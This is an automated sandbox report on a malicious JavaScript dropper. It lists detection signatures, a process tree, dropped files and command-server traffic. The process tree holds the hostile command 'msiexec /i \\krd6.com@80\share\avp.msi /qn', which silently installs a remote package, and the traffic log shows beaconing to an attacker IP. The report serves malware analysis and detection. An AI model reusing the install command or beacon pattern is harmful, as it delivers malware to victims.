Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Doc_m42_81h118103-88o62135w8623-1999q9.js

Overview

General Information

Sample name:Doc_m42_81h118103-88o62135w8623-1999q9.js
Analysis ID:1427450
MD5:d174e68fe3458262e53dee5036eeb15e
SHA1:9629e313a6299e600ff2c6086a24e3ad6ff6ba59
SHA256:092962bc268390debf17cd148d03147cdf919e442e61c92de01eac3bdb34b1c1
Tags:js
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
System process connects to network (likely due to code injection or exploit)
Creates processes via WMI
JavaScript file contains Antivirus product strings
Machine Learning detection for dropped file
Opens network shares
PE file has a writeable .text section
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Checks for available system drives (often done to infect USB drives)
Creates files inside the system directory
Deletes files inside the Windows folder
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6916 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_m42_81h118103-88o62135w8623-1999q9.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • msiexec.exe (PID: 2788 cmdline: msiexec.exe /i \\krd6.com@80\share\avp.msi /qn MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 3516 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 4992 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 52F9060B0A3925FB79F0CEC8B387C410 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Script Initiated Connection to Non-Local Network
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 87.249.49.206, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6916, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49712
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_m42_81h118103-88o62135w8623-1999q9.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_m42_81h118103-88o62135w8623-1999q9.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_m42_81h118103-88o62135w8623-1999q9.js", ProcessId: 6916, ProcessName: wscript.exe
Sigma detected: Msiexec Initiated Connection
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.26.13.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4992, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49726
Sigma detected: Script Initiated Connection
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 87.249.49.206, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6916, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49712
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_m42_81h118103-88o62135w8623-1999q9.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_m42_81h118103-88o62135w8623-1999q9.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_m42_81h118103-88o62135w8623-1999q9.js", ProcessId: 6916, ProcessName: wscript.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\sharepoint\forcedelctl.dllVirustotal: Detection: 12%Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\sharepoint\forcedelctl.dllJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.dr
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: c:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exeNetwork Connect: 87.249.49.206 80Jump to behavior
Source: Joe Sandbox ViewIP Address: 85.239.53.219 85.239.53.219
Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox ViewASN Name: UNNET-ASRU UNNET-ASRU
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.ipify.org
Source: global trafficHTTP traffic detected: POST /api/gateway HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonReferer: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 163Host: 85.239.53.219
Source: global trafficHTTP traffic detected: POST /api/de72fb63-83c4-9ec1-f109-76a72acd5289/tasks HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonReferer: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 0Host: 85.239.53.219
Source: global trafficHTTP traffic detected: POST /api/de72fb63-83c4-9ec1-f109-76a72acd5289/tasks HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonReferer: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 0Host: 85.239.53.219
Source: global trafficHTTP traffic detected: POST /api/de72fb63-83c4-9ec1-f109-76a72acd5289/tasks HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonReferer: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 0Host: 85.239.53.219
Source: global trafficHTTP traffic detected: POST /api/de72fb63-83c4-9ec1-f109-76a72acd5289/tasks HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonReferer: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 0Host: 85.239.53.219
Source: global trafficHTTP traffic detected: POST /api/de72fb63-83c4-9ec1-f109-76a72acd5289/tasks HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonReferer: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 0Host: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /share/avp.msi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: krd6.com
Source: unknownDNS traffic detected: queries for: krd6.com
Source: unknownHTTP traffic detected: POST /api/gateway HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonReferer: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 163Host: 85.239.53.219
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 410Date: Wed, 17 Apr 2024 14:51:37 GMTConnection: closeServer: WsgiDAV/4.3.0 Cheroot/10.0.0 Python/3.10.12Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 27 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 27 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 3c 70 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3a 20 2f 73 79 73 63 61 6c 6c 73 2f 61 6d 73 69 36 34 5f 36 39 31 36 2e 61 6d 73 69 2e 63 73 76 3c 2f 70 3e 0a 3c 68 72 2f 3e 0a 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 61 72 31 30 2f 77 73 67 69 64 61 76 2f 27 3e 57 73 67 69 44 41 56 2f 34 2e 33 2e 30 3c 2f 61 3e 20 2d 20 32 30 32 34 2d 30 34 2d 31 37 20 31 36 3a 35 31 3a 33 37 2e 39 30 34 32 37 33 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'><html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title></head><body> <h1>404 Not Found</h1> <p>404 Not Found: /syscalls/amsi64_6916.amsi.csv</p><hr/><a href='https://github.com/mar10/wsgidav/'>WsgiDAV/4.3.0</a> - 2024-04-17 16:51:37.904273</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 392Date: Wed, 17 Apr 2024 14:51:37 GMTConnection: closeServer: WsgiDAV/4.3.0 Cheroot/10.0.0 Python/3.10.12Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 27 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 27 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 3c 70 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3a 20 2f 44 65 73 6b 74 6f 70 2e 69 6e 69 3c 2f 70 3e 0a 3c 68 72 2f 3e 0a 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 61 72 31 30 2f 77 73 67 69 64 61 76 2f 27 3e 57 73 67 69 44 41 56 2f 34 2e 33 2e 30 3c 2f 61 3e 20 2d 20 32 30 32 34 2d 30 34 2d 31 37 20 31 36 3a 35 31 3a 33 37 2e 39 30 31 31 33 31 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'><html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title></head><body> <h1>404 Not Found</h1> <p>404 Not Found: /Desktop.ini</p><hr/><a href='https://github.com/mar10/wsgidav/'>WsgiDAV/4.3.0</a> - 2024-04-17 16:51:37.901131</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 392Date: Wed, 17 Apr 2024 14:51:38 GMTConnection: closeServer: WsgiDAV/4.3.0 Cheroot/10.0.0 Python/3.10.12Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 27 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 27 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 3c 70 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3a 20 2f 41 75 74 6f 52 75 6e 2e 69 6e 66 3c 2f 70 3e 0a 3c 68 72 2f 3e 0a 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 61 72 31 30 2f 77 73 67 69 64 61 76 2f 27 3e 57 73 67 69 44 41 56 2f 34 2e 33 2e 30 3c 2f 61 3e 20 2d 20 32 30 32 34 2d 30 34 2d 31 37 20 31 36 3a 35 31 3a 33 38 2e 35 31 33 37 32 39 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'><html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title></head><body> <h1>404 Not Found</h1> <p>404 Not Found: /AutoRun.inf</p><hr/><a href='https://github.com/mar10/wsgidav/'>WsgiDAV/4.3.0</a> - 2024-04-17 16:51:38.513729</body></html>
Source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F455D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087652535.00000277F6501000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2181258370.00000277F455D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: wscript.exe, 00000000.00000003.2180659612.00000277F455D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2181258370.00000277F455D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStaX&V
Source: wscript.exe, 00000000.00000002.2181258370.00000277F44D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F44CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087652535.00000277F6501000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087652535.00000277F6501000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: wscript.exe, 00000000.00000002.2181258370.00000277F44D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F44CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesi
Source: wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: wscript.exe, 00000000.00000002.2181258370.00000277F44D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F44CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
Source: wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087652535.00000277F6501000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wscript.exe, 00000000.00000003.2180659612.00000277F455D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2181258370.00000277F455D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTruste
Source: wscript.exe, 00000000.00000002.2181258370.00000277F44D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F44CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F455D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087652535.00000277F6501000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2181258370.00000277F455D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087652535.00000277F6501000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: wscript.exe, 00000000.00000003.2180659612.00000277F455D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2181258370.00000277F455D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/x3V
Source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wscript.exe, 00000000.00000003.2099810104.00000277F450D000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.2099810104.00000277F450D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?abfb9661f2429
Source: wscript.exe, 00000000.00000003.2099810104.00000277F4540000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093240263.00000277F4540000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F4540000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2181258370.00000277F4540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabL&
Source: wscript.exe, 00000000.00000002.2181258370.00000277F450D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F450D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099810104.00000277F450D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/ennt
Source: wscript.exe, 00000000.00000002.2181533993.00000277F6906000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180795293.00000277F6904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://krd6.com/
Source: wscript.exe, 00000000.00000002.2181533993.00000277F6923000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180795293.00000277F6923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://krd6.com/share
Source: wscript.exe, 00000000.00000003.2180880980.00000277F44AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2181241937.00000277F44B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://krd6.com/sharek
Source: wscript.exe, 00000000.00000003.2180659612.00000277F455D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2181258370.00000277F455D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digic
Source: wscript.exe, 00000000.00000003.2180659612.00000277F455D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2181258370.00000277F455D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digic3V
Source: wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F455D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087652535.00000277F6501000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2181258370.00000277F455D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087652535.00000277F6501000.00000004.00000020.00020000.00000000.sdmp, 62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0C
